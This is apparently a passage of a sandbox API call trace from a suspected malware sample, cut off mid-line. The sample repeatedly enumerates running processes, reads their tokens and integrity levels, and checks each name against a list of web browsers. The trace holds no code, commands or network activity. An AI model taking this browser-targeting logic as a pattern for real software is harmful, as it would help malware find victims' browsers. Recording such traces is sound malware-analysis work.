[0581.463] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0581.464] GetLastError () returned 0x7a [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0581.464] CloseHandle (hObject=0x5a4) returned 1 [0581.464] CloseHandle (hObject=0x5d8) returned 1 [0581.464] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0581.464] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5a4) returned 1 [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0581.464] GetLastError () returned 0x7a [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0581.464] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0581.464] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0581.464] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0581.464] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0581.464] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0581.464] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0581.464] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0581.464] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0581.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0581.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0581.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0581.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5d8 [0581.464] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5a4) returned 1 [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0581.464] GetLastError () returned 0x7a [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0581.464] CloseHandle (hObject=0x5a4) returned 1 [0581.464] CloseHandle (hObject=0x5d8) returned 1 [0581.464] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0581.464] OpenProcessToken (in: ProcessHandle=0x5d8, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5a4) returned 1 [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0581.464] GetLastError () returned 0x7a [0581.464] GetTokenInformation (in: TokenHandle=0x5a4, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0581.464] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0581.464] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0581.465] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0581.465] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0581.465] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0581.465] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0581.465] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0581.465] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0581.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0581.465] VirtualFree (lpAddress=0x490000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0581.465] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0583.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x99d8) returned 0xc0000004 [0583.464] VirtualAlloc (lpAddress=0x0, dwSize=0xa9d8, flAllocationType=0x1000, flProtect=0x4) returned 0x490000 [0583.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x490000, Length=0xa9d8, ResultLength=0x0 | out: SystemInformation=0x490000, ResultLength=0x0) returned 0x0 [0583.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0583.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0583.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0583.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0583.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2cc [0583.467] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0583.468] GetLastError () returned 0x7a [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0583.468] CloseHandle (hObject=0x5d8) returned 1 [0583.468] CloseHandle (hObject=0x2cc) returned 1 [0583.468] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0583.468] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0583.468] GetLastError () returned 0x7a [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0583.468] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0583.468] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0583.468] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0583.468] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0583.468] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0583.468] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0583.468] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0583.468] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0583.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0583.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x2cc [0583.468] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0583.468] GetLastError () returned 0x7a [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0583.468] CloseHandle (hObject=0x5d8) returned 1 [0583.468] CloseHandle (hObject=0x2cc) returned 1 [0583.468] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0583.468] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0583.468] GetLastError () returned 0x7a [0583.468] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0583.468] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0583.469] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0583.469] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0583.469] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0583.469] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0583.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0583.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0583.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0583.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x2cc [0583.469] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0583.469] GetLastError () returned 0x7a [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0583.469] CloseHandle (hObject=0x5d8) returned 1 [0583.469] CloseHandle (hObject=0x2cc) returned 1 [0583.469] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0583.469] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0583.469] GetLastError () returned 0x7a [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0583.469] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0583.469] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0583.469] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0583.469] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0583.469] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0583.469] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0583.469] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0583.469] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0583.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0583.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x2cc [0583.469] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0583.469] GetLastError () returned 0x7a [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0583.469] CloseHandle (hObject=0x5d8) returned 1 [0583.469] CloseHandle (hObject=0x2cc) returned 1 [0583.469] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0583.469] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0583.469] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0583.469] GetLastError () returned 0x7a [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0583.470] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0583.470] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0583.470] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0583.470] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0583.470] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0583.470] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0583.470] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0583.470] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0583.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0583.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0583.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0583.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x2cc [0583.470] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0583.470] GetLastError () returned 0x7a [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0583.470] CloseHandle (hObject=0x5d8) returned 1 [0583.470] CloseHandle (hObject=0x2cc) returned 1 [0583.470] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0583.470] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0583.470] GetLastError () returned 0x7a [0583.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0583.470] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0583.470] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0583.470] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0583.470] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0583.470] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0583.470] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0583.470] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0583.470] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0583.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0583.470] VirtualFree (lpAddress=0x490000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0583.471] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0585.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x99d8) returned 0xc0000004 [0585.475] VirtualAlloc (lpAddress=0x0, dwSize=0xa9d8, flAllocationType=0x1000, flProtect=0x4) returned 0x490000 [0585.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x490000, Length=0xa9d8, ResultLength=0x0 | out: SystemInformation=0x490000, ResultLength=0x0) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0585.476] OpenProcess (dwDesiredAccess=0x400, 